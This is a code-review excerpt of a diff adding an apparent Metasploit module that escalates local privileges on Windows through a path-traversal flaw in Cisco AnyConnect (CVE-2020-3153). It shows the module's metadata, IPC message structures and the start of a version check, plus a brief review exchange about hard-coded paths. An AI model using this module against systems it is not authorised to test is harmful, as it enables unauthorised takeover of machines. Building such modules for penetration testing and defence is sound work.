modules/exploits/windows/local/anyconnect_path_traversal_lpe.rb

```diff
@@ -0,0 +1,213 @@
+          Mobility Client versions 4.5.04029, 4.5.05030 and 4.7.04056 on Windows 10
+          version 1909 (x64) and Windows 7 SP1 (x86).
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Yorick Koster', # original PoC, analysis
+            'Antoine Goichot (ATGO)', # PoC
+            'Christophe De La Fuente' # msf module
+          ],
+        'Platform' => [ 'windows' ],
+        'Arch' => [ ARCH_X86, ARCH_X64 ],
+        'SessionTypes' => [ 'meterpreter' ],
+        'Targets' => [[ 'Auto', {} ]],
+        'Privileged' => true,
+        'References' =>
+          [
+            [ 'Cisco Bug ID', 'CSCvs46327' ],
+            [ 'URL', 'https://ssd-disclosure.com/ssd-advisory-cisco-anyconnect-privilege-elevation-through-path-traversal/'],
+            [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ac-win-path-traverse-qO4HWBsj'],
+            [ 'CVE', '2020-3153']
+          ],
+        'DisclosureDate' => 'Feb 19 2020',
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'FileDropperDelay' => 10
+        }
+      )
+    )
+
+    register_advanced_options [
+      OptBool.new('ForceExploit', [ false, 'Override check result', false ])
+    ]
+  end
+
+  # See AnyConnect IPC protocol articles:
+  # - https://www.serializing.me/2016/12/14/anyconnect-elevation-of-privileges-part-1/
+  # - https://www.serializing.me/2016/12/20/anyconnect-elevation-of-privileges-part-2/
+  class CIPCHeader < BinData::Record
+    endian :little
+
+    uint32 :id_tag,            label: 'ID Tag', value: 0x4353434f
+    uint16 :header_length,     label: 'Header Length', initial_value: -> { num_bytes }
+    uint16 :data_length,       label: 'Data Length', initial_value: -> { parent.body.num_bytes }
+    uint32 :ipc_repsonse_cb,   label: 'IPC response CB', initial_value: 0xFFFFFFFF
+    uint32 :msg_user_context,  label: 'Message User Context', initial_value: 0x00000000
+    uint32 :request_msg_id,    label: 'Request Message Id', initial_value: 0x00000002
+    uint32 :return_ipc_object, label: 'Return IPC Object', initial_value: 0x00000000
+    uint8  :message_type,      label: 'Message Type', initial_value: 1
+    uint8  :message_id,        label: 'Message ID', initial_value: 2
+  end
+
+  class CIPCTlv < BinData::Record
+    endian :big
+
+    uint8   :msg_type,   label: 'Type'
+    uint8   :msg_index,  label: 'Index'
+    uint16  :msg_length, label: 'Length', initial_value: -> { msg_value.num_bytes }
+    stringz :msg_value,  label: 'Value', length: -> { msg_length }
+  end
+
+  class CIPCMessage < BinData::Record
+    endian :little
+
+    cipc_header :header, label: 'Header'
+    array :body, label: 'Body', type: :cipc_tlv, read_until: :eof
+  end
+
+  def check
+    file_path = nil
+    path = 'Cisco\\Cisco AnyConnect Secure Mobility Client'
+    [ 'C:\\Program Files (x86)', 'C:\\Program Files' ].each do |pf_path|
```

Comment:
Perhaps use environment variables rather than, or in addition to, hard-coded paths?

Reply:
Absolutely, I will update this. Thanks!